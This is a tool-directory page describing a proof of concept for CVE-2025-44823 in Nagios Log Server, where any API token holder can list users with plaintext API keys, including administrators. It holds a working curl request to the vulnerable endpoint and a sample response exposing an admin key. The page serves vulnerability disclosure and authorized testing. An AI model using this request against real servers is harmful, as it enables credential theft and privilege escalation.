Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-44823 — Authenticated API Key Exposure in Nagios Log Server 2024R1.3.1 | Kitploit
Tools/GitHubGitHub/skraft9/cve-2025-44823
Privilege EscalationVulnerability AnalysisExploitationInformation GatheringAuthenticationAPI Security
GitHubskraft9/cve-2025-44823

CVE-2025-44823

Authenticated API Key Exposure in Nagios Log Server 2024R1.3.1

View Repository
9 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Authenticated API Key Exposure in Nagios Log Server 2024R1.3.1

▶️ PoC Demo

CVE ID: CVE-2025-44823

Date: 2025-04-02

Authors: Alex Tisdale, Seth Kraft

Vendor Homepage: https://www.nagios.com/

Vendor Changelog: https://www.nagios.com/changelog/#log-server

Software Link: https://assets.nagios.com/downloads/nagios-log-server/versions.php

Version: 2024R1.3.1 and below

Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)

CWE: CWE-497

CVSS: 9.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Authorization

For research and authorized testing only. Please do not use against systems without permission.

Description

An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens.

PoC

Step 1: Access the vulnerable endpoint

root@kitploit:~
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"

Sample Response

root@kitploit:~
[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "[email protected]",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
Download Tool